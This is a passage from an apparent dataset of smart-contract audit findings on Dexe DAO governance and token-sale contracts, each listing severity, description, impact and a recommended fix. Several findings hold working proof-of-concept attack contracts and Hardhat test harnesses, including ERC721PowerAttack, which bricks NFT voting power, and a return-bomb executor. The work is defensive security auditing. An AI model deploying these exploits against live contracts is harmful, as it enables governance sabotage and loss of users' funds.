buyInput18Dec = wei(\"100\");\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput18Dec);\\n\\n // buyer has bought wei(100) sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, buyInput18Dec);\\n\\n // buyer has 900 000000 remaining purchaseToken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), \"900000000\");\\n\\n // next buyer attempts to purchase using 100 purchaseToken3 tokens\\n // but sends input formatted into native 6 decimals\\n // sends 6 decimal input: 100 000000\\n let buyInput6Dec = 100000000;\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput6Dec);\\n\\n // buyer has bought an additional 100000000 sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, \"100000000000100000000\");\\n\\n // but the buyer still has 900 000000 remaining purchasetoken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), \"900000000\");\\n\\n // by sending the input amount formatted to 6 decimal places,\\n // the buyer was able to buy small amounts of the token being sold\\n // for free!\\n });\\n```\\n\\nFinally run the test with: `npx hardhat test --grep \"audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO\"`ч```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}(\"\");\\n require(success, \"TSP: failed to transfer ether\");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n -Attacker can destroy user voting power by setting `ERC721Power::totalPower` and all existing NFTs `currentPower` to 0чhighчAttacker can destroy user voting power by setting `ERC721Power::totalPower` & all existing nfts' `currentPower` to 0 via a permission-less attack contract by exploiting a discrepancy (\"<\" vs \"<=\") in `ERC721Power` L144 & L172:\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n\\nThis attack has to be run on the exact block that power calculation starts (when block.timestamp == ERC721Power.powerCalcStartTimestamp).чResolve the discrepancy between `ERC721Power` L144 & L172.ч`ERC721Power::totalPower` & all existing nft's `currentPower` are set 0, negating voting using `ERC721Power` since `totalPower` is read when creating the snapshot and `GovUserKeeper::getNftsPowerInTokensBySnapshot()` will return 0 same as if the nft contract didn't exist. Can also negatively affect the ability to create proposals.\\nThis attack is extremely devastating as the individual power of `ERC721Power` nfts can never be increased; it can only decrease over time if the required collateral is not deposited. By setting all nfts' `currentPower = 0` as soon as power calculation starts (block.timestamp == ERC721Power.powerCalcStartTimestamp) the `ERC721Power` contract is effectively completely bricked - there is no way to \"undo\" this attack unless the nft contract is replaced with a new contract.\\nDexe-DAO can be created using only nfts for voting; in this case this exploit which completely bricks the voting power of all nfts means a new DAO has to be re-deployed since no one can vote as everyone's voting power has been destroyed.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport \"../../gov/ERC721/ERC721Power.sol\";\\n\\nimport \"hardhat/console.sol\";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower by the the true max power of all\\n // the power nfts that exist (to zero), regardless of who owns them, and sets the current\\n // power of all nfts to zero, totally bricking the ERC721Power contract.\\n //\\n // this attack only works when block.timestamp == nftPower.powerCalcStartTimestamp\\n // as it takes advantage of a difference in getNftPower() & recalculateNftPower():\\n //\\n // getNftPower() returns 0 when block.timestamp <= powerCalcStartTimestamp\\n // recalculateNftPower returns 0 when block.timestamp < powerCalcStartTimestamp\\n function attack(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp == nftPower.powerCalcStartTimestamp(),\\n \"ERC721PowerAttack: attack requires block.timestamp == nftPower.powerCalcStartTimestamp\"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n \"ERC721PowerAttack: incorrect initial totalPower\"\\n );\\n\\n // call recalculateNftPower() for every nft, this:\\n // 1) decreases ERC721Power::totalPower by that nft's max power\\n // 2) sets that nft's currentPower = 0\\n for (uint256 i = 1; i <= lastTokenId; ) {\\n require(\\n nftPower.recalculateNftPower(i) == 0,\\n \"ERC721PowerAttack: recalculateNftPower() should return 0 for new nft power\"\\n );\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n require(\\n nftPower.totalPower() == 0,\\n \"ERC721PowerAttack: after attack finished totalPower should equal 0\"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(\"audit attacker can manipulate ERC721Power totalPower\", () => {\\n it(\"audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0\", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(\"100\");\\n let requiredCollateral = wei(\"100\");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n // hack needed to start attack contract on exact block due to hardhat\\n // advancing block.timestamp in the background between function calls\\n let powerCalcStartTime2 = (await getCurrentBlockTime()) + 999;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(\"10\"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(\"0\").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(\"ERC721PowerAttack\");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to the start of power calculation\\n await setTime(powerCalcStartTime2);\\n\\n // launch the attack\\n await attackContract.attack(nft.address, maxPowerPerNft.times(10).toFixed(), 10);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep \"audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0\"`ч```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n -A malicious DAO Pool can create a token sale tier without actually transferring any DAO tokensчhighч`TokenSaleProposalCreate::createTier` is called by a DAO Pool owner to create a new token sale tier. A fundamental prerequisite for creating a tier is that the DAO Pool owner must transfer the `totalTokenProvided` amount of DAO tokens to the `TokenSaleProposal`.\\nCurrent implementation implements a low-level call to transfer tokens from `msg.sender(GovPool)` to `TokenSaleProposal` contract. However, the implementation fails to validate the token balances after the transfer is successful. We notice a `dev` comment stating \"return value is not checked intentionally\" - even so, this vulnerability is not related to checking return `status` but to verifying the contract balances before & after the call.\\n```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n\\nSince a DAO Pool owner can use any ERC20 as a DAO token, it is possible for a malicious Gov Pool owner to implement a custom ERC20 implementation of a token that overrides the `transferFrom` function. This function can override the standard ERC20 `transferFrom` logic that fakes a successful transfer without actually transferring underlying tokens.чCalculate the contract balance before and after the low-level call and verify if the account balance increases by `totalTokenProvided`. Please be mindful that this check is only valid for non-fee-on-transfer tokens. For fee-on-transfer tokens, the balance increase needs to be further adjusted for the transfer fees. Example code for non-free-on-transfer-tokens:\\n```\\n // transfer sale tokens to TokenSaleProposal and validate the transfer\\n IERC20 saleToken = IERC20(_tierInitParams.saleTokenAddress);\\n\\n // record balance before transfer in 18 decimals\\n uint256 balanceBefore18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // perform the transfer\\n saleToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _tierInitParams.totalTokenProvided.from18Safe(_tierInitParams.saleTokenAddress)\\n );\\n\\n // record balance after the transfer in 18 decimals\\n uint256 balanceAfter18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // verify that the transfer has actually occured to protect users from malicious\\n // sale tokens that don't actually send the tokens for the token sale\\n require(balanceAfter18 - balanceBefore18 == _tierInitParams.totalTokenProvided,\\n \"TSP: token sale proposal creation received incorrect amount of tokens\"\\n );\\n```\\nчA fake tier can be created without the proportionate amount of DAO Pool token balance in the `TokenSaleProposal` contract. Naive users can participate in such a token sale assuming their DAO token claims will be honoured at a future date. Since the pool has insufficient token balance, any attempts to claim the DAO pool tokens can lead to a permanent DOS.ч```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n -Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0чhighчAttacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0 using a permission-less attack contract by taking advantage of being able to call `ERC721Power::recalculateNftPower()` & `getNftPower()` for non-existent nfts:\\n```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\nч`ERC721Power::recalculateNftPower()` should revert when called for non-existent nfts.ч`ERC721Power::totalPower` lowered to near 0. This can be used to artificially increase voting power since `totalPower` is read when creating the snapshot and is used as the divisor in `GovUserKeeper::getNftsPowerInTokensBySnapshot()`.\\nThis attack is pretty devastating as `ERC721Power::totalPower` can never be increased since the `currentPower` of individual nfts can only ever be decreased; there is no way to \"undo\" this attack unless the nft contract is replaced with a new contract.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport \"../../gov/ERC721/ERC721Power.sol\";\\n\\nimport \"hardhat/console.sol\";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower close to 0\\n //\\n // this attack works when block.timestamp > nftPower.powerCalcStartTimestamp\\n // by taking advantage calling recalculateNftPower for non-existent nfts\\n function attack2(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId,\\n uint256 attackIterations\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp > nftPower.powerCalcStartTimestamp(),\\n \"ERC721PowerAttack: attack2 requires block.timestamp > nftPower.powerCalcStartTimestamp\"\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n \"ERC721PowerAttack: incorrect initial totalPower\"\\n );\\n\\n // output totalPower before attack\\n console.log(nftPower.totalPower());\\n\\n // keep calling recalculateNftPower() for non-existent nfts\\n // this lowers ERC721Power::totalPower() every time\\n // can't get it to 0 due to underflow but can get close enough\\n for (uint256 i; i < attackIterations; ) {\\n nftPower.recalculateNftPower(++lastTokenId);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // output totalPower after attack\\n console.log(nftPower.totalPower());\\n\\n // original totalPower : 10000000000000000000000000000\\n // current totalPower : 900000000000000000000000000\\n require(\\n nftPower.totalPower() == 900000000000000000000000000,\\n \"ERC721PowerAttack: after attack finished totalPower should equal 900000000000000000000000000\"\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(\"audit attacker can manipulate ERC721Power totalPower\", () => {\\n it(\"audit attack 2 dramatically lowers ERC721Power totalPower\", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(\"100\");\\n let requiredCollateral = wei(\"100\");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(\"10\"), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(\"0\").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(\"ERC721PowerAttack\");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to just after the start of power calculation\\n await setTime(powerCalcStartTime);\\n\\n // launch the attack\\n await attackContract.attack2(nft.address, maxPowerPerNft.times(10).toFixed(), 10, 91);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep \"audit attack 2 dramatically lowers ERC721Power totalPower\"`ч```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n -`GovPool::delegateTreasury` does not verify transfer of tokens and NFTs to delegatee leading to potential voting manipulationчhighч`GovPool::delegateTreasury` transfers ERC20 tokens & specific nfts from DAO treasury to `govUserKeeper`. Based on this transfer, the `tokenBalance` and `nftBalance` of the delegatee is increased. This allows a delegatee to use this delegated voting power to vote in critical proposals.\\nAs the following snippet of `GovPool::delegateTreasury` function shows, there is no verification that the tokens and nfts are actually transferred to the `govUserKeeper`. It is implicitly assumed that a successful transfer is completed and subsequently, the voting power of the delegatee is increased.\\n```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, \"Gov: empty delegation\");\\n require(getExpertStatus(delegatee), \"Gov: delegatee is not an expert\");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n\\nThis could lead to a dangerous situation where a malicious DAO treasury can increase voting power manifold while actually transferring tokens only once (or even, not transfer at all). This breaks the invariance that the total accounting balances in `govUserKeeper` contract must match the actual token balances in that contract.чSince DEXE starts out with a trustless assumption that does not give any special trust privileges to a DAO treasury, it is always prudent to follow the \"trust but verify\" approach when it comes to non-standard tokens, both ERC20 and ERC721. To that extent, consider adding verification of token & nft balance increase before/after token transfer.чSince both the ERC20 and ERC721 token implementations are controlled by the DAO, and since we are dealing with upgradeable token contracts, there is a potential rug-pull vector created by the implicit transfer assumption above.ч```\\n function delegateTreasury(\\n address delegatee,\\n uint256 amount,\\n uint256[] calldata nftIds\\n ) external override onlyThis {\\n require(amount > 0 || nftIds.length > 0, \"Gov: empty delegation\");\\n require(getExpertStatus(delegatee), \"Gov: delegatee is not an expert\");\\n\\n _unlock(delegatee);\\n\\n if (amount != 0) {\\n address token = _govUserKeeper.tokenAddress();\\n\\n > IERC20(token).transfer(address(_govUserKeeper), amount.from18(token.decimals())); //@audit no check if tokens are actually transferred\\n\\n _govUserKeeper.delegateTokensTreasury(delegatee, amount);\\n }\\n\\n if (nftIds.length != 0) {\\n IERC721 nft = IERC721(_govUserKeeper.nftAddress());\\n\\n for (uint256 i; i < nftIds.length; i++) {\\n > nft.safeTransferFrom(address(this), address(_govUserKeeper), nftIds[i]); //-n no check if nft's are actually transferred\\n }\\n\\n _govUserKeeper.delegateNftsTreasury(delegatee, nftIds);\\n }\\n\\n _revoteDelegated(delegatee, VoteType.TreasuryVote);\\n\\n emit DelegatedTreasury(delegatee, amount, nftIds, true);\\n }\\n```\\n -Voting to change `RewardsInfo::voteRewardsCoefficient` has an unintended side-effect of retrospectively changing voting rewards for active proposalsчmediumч`GovSettings::editSettings` is one of the functions that can be executed via an internal proposal. When this function is called, setting are validated via `GovSettings::_validateProposalSettings`. This function does not check the value of `RewardsInfo::voteRewardsCoefficient` while updating the settings. There is neither a floor nor a cap for this setting.\\nHowever, we've noted that this coefficient amplifies voting rewards as calculated in the `GovPoolRewards::_getInitialVotingRewards` shown below.\\n```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n\\nThis has the unintended side-effect that for the same proposal, different voters can get paid different rewards based on when the reward was claimed. In the extreme case where `core.settings.rewardsInfo.voteRewardsCoefficient` is voted to 0, note that we have a situation where voters who claimed rewards before the update got paid as promised whereas voters who claimed later got nothing.чConsider freezing `voteRewardMultiplier` and the time of proposal creation. A prospective update of this setting via internal voting should not change rewards for old proposals.чUpdating `rewardsCoefficient` can lead to unfair reward distribution on old proposals. Since voting rewards for a given proposal are communicated upfront, this could lead to a situation where promised rewards to users are not honoured.\\nProof of Concept: N/Aч```\\n function _getInitialVotingRewards(\\n IGovPool.ProposalCore storage core,\\n IGovPool.VoteInfo storage voteInfo\\n ) internal view returns (uint256) {\\n (uint256 coreVotes, uint256 coreRawVotes) = voteInfo.isVoteFor\\n ? (core.votesFor, core.rawVotesFor)\\n : (core.votesAgainst, core.rawVotesAgainst);\\n\\n return\\n coreRawVotes.ratio(core.settings.rewardsInfo.voteRewardsCoefficient, PRECISION).ratio(\\n voteInfo.totalVoted,\\n coreVotes\\n ); //@audit -> initial rewards are calculated proportionate to the vote rewards coefficient\\n }\\n```\\n -Proposal execution can be DOSed with return bombs when calling untrusted execution contractsчmediumч`GovPool::execute` does not check for return bombs when executing a low-level call. A return bomb is a large bytes array that expands the memory so much that any attempt to execute the transaction will lead to an `out-of-gas` exception.\\nThis can create potentially risky outcomes for the DAO. One possible outcome is \"single sided\" execution, ie. \"actionsFor\" can be executed when voting is successful while \"actionsAgainst\" can be DOSed when voting fails.\\nA clever proposal creator can design a proposal in such a way that only `actionsFor` can be executed and any attempts to execute `actionsAgainst` will be permanently DOS'ed (refer POC contract). T\\nThis is possible because the `GovPoolExecute::execute` does a low level call on potentially untrusted `executor` assigned to a specific action.\\n```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\nчConsider using `ExcessivelySafeCall` while calling untrusted contracts to avoid return bombs.чVoting actions can be manipulated by a creator causing two potential issues:\\nProposal actions can never be executed even after successful voting\\nOne-sided execution where some actions can be executed while others can be DOSed\\nProof of Concept: Consider the following malicious proposal action executor contract. Note that when the proposal passes (isVotesFor = true), the `vote()` function returns empty bytes and when the proposal fails (isVotesFor = false), the same function returns a huge bytes array, effectively causing an \"out-of-gas\" exception to any caller.\\n```\\ncontract MaliciousProposalActionExecutor is IProposalValidator{\\n\\n function validate(IGovPool.ProposalAction[] calldata actions) external view override returns (bool valid){\\n valid = true;\\n }\\n\\n function vote(\\n uint256 proposalId,\\n bool isVoteFor,\\n uint256 voteAmount,\\n uint256[] calldata voteNftIds\\n ) external returns(bytes memory result){\\n\\n if(isVoteFor){\\n // @audit implement actions for successful vote\\n return \"\"; // 0 bytes\\n }\\n else{\\n // @audit implement actions for failed vote\\n\\n // Create a large bytes array\\n assembly{\\n revert(0, 1_000_000)\\n }\\n }\\n\\n }\\n}\\n```\\nч```\\n function execute(\\n mapping(uint256 => IGovPool.Proposal) storage proposals,\\n uint256 proposalId\\n ) external {\\n // rest of code. // code\\n\\n for (uint256 i; i < actionsLength; i++) {\\n> (bool status, bytes memory returnedData) = actions[i].executor.call{\\n value: actions[i].value\\n }(actions[i].data); //@audit returnedData could expand memory and cause out-of-gas exception\\n\\n require(status, returnedData.getRevertMsg());\\n }\\n }\\n```\\n -Use low-level `call()` to prevent gas griefing attacks when returned data not requiredчlowчUsing `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool status, ) = payable(receiver).call{value: amount}(\"\");\\nrequire(status, \"Gov: failed to send eth\");\\n```\\n\\nIs the same as writing:\\n```\\n(bool status, bytes memory data ) = payable(receiver).call{value: amount}(\"\");\\nrequire(status, \"Gov: failed to send eth\");\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.чUse a low-level call when the returned data is not required, eg:\\n```\\nbool status;\\nassembly {\\n status := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\n```\\n\\nConsider using ExcessivelySafeCall.чContracts unnecessarily expose themselves to gas griefing attacks.ч```\\n(bool status, ) = payable(receiver).call{value: amount}(\"\");\\nrequire(status, \"Gov: failed to send eth\");\\n```\\n -`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`чlowч`abi.encodePacked()` should not be used with dynamic types when passing the result to a hash function such as `keccak256()`.\\nUse `abi.encode()` instead which will pad items to 32 bytes, which will prevent hash collisions (e.g. `abi.encodePacked(0x123,0x456)` => `0x123456` => `abi.encodePacked(0x1,0x23456)`, but `abi.encode(0x123,0x456)` => 0x0...1230...456).\\nUnless there is a compelling reason, `abi.encode` should be preferred. If there is only one argument to `abi.encodePacked()` it can often be cast to `bytes()` or 